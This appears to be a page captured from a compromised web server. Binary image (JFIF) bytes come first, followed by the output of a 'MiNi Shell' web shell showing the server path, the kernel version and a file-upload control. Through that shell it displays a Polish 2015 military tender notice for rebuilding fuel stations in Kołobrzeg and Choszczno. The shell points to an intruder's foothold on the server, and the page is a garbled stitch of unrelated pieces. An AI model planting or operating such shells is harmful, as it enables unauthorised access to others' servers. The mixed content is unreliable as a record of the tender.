JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151015/273458-N-2015.html

<p class="kh_header"><b>Szczecin: Roboty budowlane obejmujące przebudowę stacji paliw płynnych na magazyn paliw w m. Kołobrzeg i Choszczno (PKOB 1230).</b><br>
<b>Numer ogłoszenia: 273458 - 2015; data zamieszczenia: 15.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 261 452026, 261 452000, faks 261 452024, 261 452029.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rziszczecin.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane obejmujące przebudowę stacji paliw płynnych na magazyn paliw w m. Kołobrzeg i Choszczno (PKOB 1230)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących przebudowę stacji paliw płynnych na magazyn paliw w m. Kołobrzeg i Choszczno (PKOB 1230).

Przedmiot zamówienia składa się z dwóch części:

Część I - Przebudowa stacji paliw płynnych na magazyn paliw w m. Kołobrzeg  w szczególności  polega na wykonaniu:

1)	robót ogólnobudowlanych, w tym m.in.: rozbiórkowych, ziemnych, drogowych, odwodnieniowych,  montażowych, konstrukcyjnych, izolacyjnych, fundamentowych, termoizolacyjnych budynku, dekarskich (wykonanie pokrycia dachu),  malarskich, wymiana stolarki okiennej i  drzwiowej, roboty wykończeniowe wewnętrzne (podłogi, ściany sufity), budowa wiaty stalowej, posadowienie dwóch podziemnych stalowych zbiorników dwupłaszczowych na fundamencie oraz wykonanie badania gruntu.

2)	robót sanitarnych, w tym m.in.: rozbiórkowych, demontażowych, ziemnych, montażowych, rozruchu, wykonanie instalacji paliwowej, wykonanie litrażowania zbiorników właściwym paliwem dla danego zbiornika; wykonaniu czynności odbiorowych z Wojskowym Dozorem Technicznym (WDT) i Głównym Urzędem Miar (GUM), wykonanie zewnętrznego przyłącza sieci kanalizacyjnej, deszczowej, sanitarnej, wodociągowej (rurociągi, elementy, urządzenia), wykonanie wew. instalacji wodociągowej, wykonanie instalacji kanalizacji sanitarnej wew..

3)	robót elektrycznych, w tym m.in.: demontażowych, montażowych, wykonaniu instalacji elektrycznych, wykonaniu rozdzielnicy,   wykonaniu instalacji oświetleniowej, instalacji odgromowej, uziemienia, wykonaniu  badań i pomiarów elektrycznych i inwentaryzacji  istniejącej instalacji wraz demontażem jej elementów, wykonaniu linii kablowej nn dla zasilania stacji, wykonaniu  instalacji kamer monitoringu.

4)	robót drogowych, w tym m.in.: rozbiórkowych, ziemnych, montażowych, wykonanie płyty szczelnej,  nawierzchni z kostki betonowej, wyspy, trawników.

UWAGA:
Powierzchnia terenu utwardzonego podlegającego remontowi (wymianie) zwiększy się o ok. 600m2 , w związku z czym należy to uwzględnić w cenie oferty. 

5)	wyposażenia w budynku MPS.


UWAGA:
- Wszystkie roboty mają być wykonane zgodnie z obowiązującymi przepisami i normami.
	Zgłoszenie robót nie wymagających pozwolenia na budowę należy dokonać na 30 dni przed zamiarem rozpoczęcia prac, do prac można przystąpić jeżeli w ciągu tych 30 dni właściwy organ nie wniesie, w drodze decyzji, sprzeciwu i nie później niż po upływie 2 lat od określonego w zgłoszeniu terminu ich rozpoczęcia.

- Wykonawca przy wykonywaniu robót związanych z nawierzchnią przy stacji paliw płynnych uzgodni je z użytkownikiem; konieczność położenia/remontu nawierzchni przy KSP-20, która jest obiektem czynnym.

- Wykonawca zapewni zasilanie tymczasowe KSP w trakcie robót budowlanych.


Część II - Przebudowa stacji paliw płynnych  na magazyn paliw  (modernizacja zbiorników magazynowych paliw płynnych) w m. Choszczno w szczególności  polega na wykonaniu: 

1)	robót ogólnobudowlanych, w tym m.in.: rozbiórkowych, ziemnych, drogowych, odwodnieniowych,  montażowych, konstrukcyjnych, izolacyjnych, fundamentowych, termoizolacyjnych budynku, dekarskich (wykonanie pokrycia dachu), wymiana stolarki okiennej i  drzwiowej, roboty wykończeniowe wewnętrzne (podłogi, ściany sufity), budowa wiaty stalowej,  posadowienie stalowego zbiornika dwupłaszczowych na fundamencie oraz wykonanie badania gruntu.

2)	robót sanitarnych, w tym m.in.: rozbiórkowych, demontażowych, ziemnych, montażowych, rozruchu, wykonanie instalacji paliwowej, wykonanie litrażowania zbiorników właściwym paliwem dla danego zbiornika; wykonaniu czynności odbiorowych z Wojskowym Dozorem Technicznym (WDT) i Głównym Urzędem Miar (GUM), wykonanie zewnętrznych sieci kanalizacyjnej, deszczowej (rurociągi, elementy, urządzenia).

3)	robót elektrycznych, w tym m.in.: demontażowych, montażowych, wykonaniu instalacji elektrycznych, wykonaniu rozdzielnicy,   wykonaniu instalacji oświetleniowej, instalacji odgromowej, uziemienia, wykonaniu  badań i pomiarów elektrycznych i inwentaryzacji  istniejącej instalacji wraz demontażem jej elementów, wykonaniu linii kablowej nn dla zasilania stacji, wykonaniu  instalacji kamer monitoringu.

4)	robót drogowych, w tym m.in.: rozbiórkowych, ziemnych, montażowych, wykonanie płyty szczelnej,  nawierzchni z kostki betonowej i granitowej, wyspy, trawników.

5)	wyposażenia w budynku MPS.


UWAGA:
- Wszystkie roboty mają być wykonane zgodnie z obowiązującymi przepisami i normami.
	Zgłoszenie robót nie wymagających pozwolenia na budowę należy dokonać na 30 dni przed zamiarem rozpoczęcia prac, do prac można przystąpić jeżeli w ciągu tych 30 dni właściwy organ nie wniesie, w drodze decyzji, sprzeciwu i nie później niż po upływie 2 lat od określonego w zgłoszeniu terminu ich rozpoczęcia.

- Wykonawca przy wykonywaniu robót związanych z nawierzchnią przy stacji paliw płynnych uzgodni je z użytkownikiem; konieczność położenia/remontu nawierzchni przy KSP-20, która jest obiektem czynnym.

- Wykonawca zapewni zasilanie tymczasowe KSP w trakcie robót budowlanych.

Dotyczy części I i części II:

Zakres przedmiotu zamówienia obejmuje także:

1)	Wykonanie robót geodezyjnych (celem wykonania między innymi: wytyczenia, wykonania inwentaryzacji powykonawczej oraz aktualizacji mapy w Ośrodku Dokumentowania Budownictwa Wojskowego Rejonowego Zarządu Infrastruktury Szczecin).
2)	Wykonawca przed przystąpieniem do przedmiotowego zakresu robót wykona inwentaryzację fotograficzną oraz po ich zakończeniu, wykona dokumentację powykonawczą fotograficzną  (fotografując przed ich wykonaniem i po ich wykonaniu z tego samego ujęcia w celu porównania).
3)	Wykonawca jest wytwórcą odpadów budowlanych. Po stronie Wykonawcy leży wykonanie na swój koszt utylizacji odpadów powstałych w wyniku robót budowlanych zgodnie z Ustawą o Odpadach z dnia 14.12.2012 r. (tekst jednolity Dz. U. 2013 poz. 21). Materiały z rozbiórki niepodlegające utylizacji Wykonawca zagospodaruje we własnym zakresie, a ich wartość szacunkową  ujmie w cenie oferty.
4)	Wykonawca robót wykona dokumentację powykonawczą, oraz przekaże dla Zamawiającego zgodnie z zapisami Ustawy  Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami materiały wymienione w art. 60 - dokumentację budowy i dokumentację powykonawczą. Przekazaniu podlegają również inne dokumenty dotyczące obiektu a także instrukcje obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. 
5)	Wykonawca w ramach zawartej umowy złoży zawiadomienie o zakończeniu robót do ZWINB minimum 21 dni przed upływem terminu zakończenia umowy na podstawie pełnomocnictw Zamawiającego, zgodnie z art. 54 Ustawy Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami).
6)	Przeprowadzenie rewizji wewnętrznej zbiorników w obecności inspektora Wojskowego Dozoru Technicznego.
7)	Opracowanie dokumentacji powykonawczej  zbiorników, uzgodnionej i zatwierdzonej przez Wojskowy Dozór Techniczny.
8)	Wykonanie próby drożności oraz szczelności zbiorników w obecności Inspektora Wojskowego Dozoru Technicznego.
9)	Wykonanie litrażowania oraz legalizacji zbiorników przez Okręgowy Urząd Miar.

10)	Pozostałe prace i czynności wynikłe z uwag Wojskowego Dozoru Technicznego oraz niezbędne do przekazania Zamawiającemu zbiorników gotowych do eksploatacji zgodnie z obowiązującymi w tym zakresie przepisami prawa.
11)	Wszystkie materiały, urządzenia, których znaki towarowe lub nazwy własne zostały wskazane w dokumentacji projektowej należy traktować jako przykładowe i dopuszcza się możliwość ofert równoważnych o parametrach nie niższych niż wskazane w dokumentacji projektowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.37.20-9, 45.22.00.00-5, 45.31.00.00-3, 45.23.14.00-9, 45.35.10.00-2, 45.23.24.11-6, 45.23.12.10-0, 45.11.12.50-5, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium 70.000,00 PLN dla całości zamówienia (art. 45, 46), w tym:
- dla części I - w wysokości 40 000,00 PLN, 
- dla części II - w wysokości 30 000,00 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności w zakresie pozwalającym na realizację zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych obejmujących swoim zakresem wykonanie przebudowy, remontu, modernizacji stacji paliw wraz z wykonaniem modernizacji zbiorników magazynowych o łącznej minimalnej wartości:
- dla części I - 350 000,00 zł brutto, 
- dla części II - 300 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednim potencjałem technicznym, tj. posiadanie autoryzacji producenckich na projektowanie, instalację oraz serwis urządzeń wykrywczych, telewizyjnych, zaoferowanych przez siebie systemów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednim potencjałem technicznym oraz odpowiednimi osobami zdolnymi do wykonania zamówienia (dla każdej części osobno), tj. 
a)	 osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności:
-    konstrukcyjno - budowlanej bez ograniczeń (kierownik robót) - minimum 1 osoba,
- 	instalacyjnej w zakresie sieci, instalacji i urządzen cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczen (kierownik budowy) - minimum 1 osoba,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (kierownik robót) - minimum 1 osoba,
b)	 osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia:
- 	geodezyjne w zakresie geodezyjnych pomiarów sytuacyjno - wysokościowych, realizacyjnych i inwentaryzacyjnych oraz posiadająca dostęp do informacji niejawnych do klauzuli co najmniej ZASTRZEZONE - minimum 1 osoba.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wykaz parametrów cenotwórczych: robocizny, kosztów pośrednich, zysku, kosztu zakupu materiałów.

2)	Harmonogram rzeczowo - finansowy z wypełnioną kolumną nr 3 i 4 oraz z graficznym określeniem czasu wykonania poszczególnych elementów (Załącznik nr 7 do SIWZ). Suma wartości poszczególnych elementów zamówienia musi być tożsama z wartością oferty z uwzględnieniem limitów finansowych określonych przez zamawiającego na dany rok kalendarzowy.
3)	 Oświadczenie o posiadaniu geodety, o którym mowa w części VII ust. 1 pkt 3) lit. b) upoważnionego do dostępu do informacji niejawnych do klauzuli co najmniej ZASTRZEŻONE.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku:

1)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
2)	wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w innych sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
3)	wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy, inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których Wykonawca realizuje przedmiot umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających określone na dzień składania ofert, warunki postawione przez Zamawiającego w specyfikacji;
4)	zmiany podwykonawcy robót wskazanych w ofercie, pod warunkiem uzyskania zgody Zamawiającego na zatrudnienie nowego podwykonawcy;
5)	wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego;
6)	wystąpienia konieczności wprowadzenia zmian w harmonogramie realizacji przedmiotu umowy poprzez: przesunięcie w czasie, uszczegółowienie spowodowane obiektywnymi czynnikami, niezależnymi od Wykonawcy, uniemożliwiającymi realizację przedmiotu umowy zgodnie z pierwotną wersją harmonogramu;
7)	zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, a także z np. wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń;
8)	zmiany spowodowanej okolicznościami siły wyższej lub powstałej z winy osób trzecich,
9)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy;
10)	zmiany danych teleadresowych;
11)	zmiana obowiązującej stawki podatku VAT;
12)	uzasadnionej rezygnacji z wykonania części robót budowlanych w wyniku zmian wprowadzonych do dokumentacji projektowej i związanego z tym pomniejszenia wynagrodzenia obliczonego zgodnie z wskaźnikami cenotwórczymi określonymi w ofercie, średnimi cenami SEKOCENBUD dla kwartału poprzedzającego wycenę, a w przypadku braku danych zgodnie z cenami rynkowymi aktualnymi w tym okresie;
13)	uzasadnionej rezygnacji z wykonania części robót budowlanych w wyniku zmian wprowadzonych do dokumentacji projektowej;
14)	zmiany kierownika budowy lub kierowników robót. Warunkiem zmiany będzie posiadanie przez te osoby uprawnień, takich jak wskazane w ofercie;
15)	poprawy jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych lub zmiany technologii na korzystniejszą, nowocześniejszą, tańszą niż określona w SIWZ;
16)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmianę obowiązujących przepisów;
17)	wprowadzenia do dokumentacji projektowej zmian, o których mowa w art. 36a ust. 5 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jedn. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) wymagających zgody projektanta;
18)	zmiany wymiarów, położenia lub wysokości elementów związanych z robotą budowlaną;
19)	zmiany w kolejności i terminach wykonywania robót budowlanych niemożliwych do przewidzenia w chwili zawierania umowy;
20)	konieczności zmiany terminu wykonania przedmiotu umowy w przypadku:
- 	konieczności wykonania zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt 5 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, (t.j. Dz.U. z 2013 r., poz. 907 z późn. zm.), warunkujących wykonanie przedmiotu zamówienia,
- 	konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,
- 	wstrzymania wykonania całości lub części robót na skutek wystąpienia okoliczności niezależnych od wykonawcy, w tym zmiana warunków terenowych (np. kolizja z niezinwentaryzowanymi instalacjami i urządzeniami podziemnymi, drzewami, niewypały i niewybuchy, wykopaliska archeologiczne,
- 	utrzymywania się niskich temperatur i pokrywy śniegu;
  	powyższe będzie możliwe pod warunkiem potwierdzenia przez inspektora nadzoru w dzienniku budowy wystąpienia okoliczności uzasadniających zmianę terminu; 
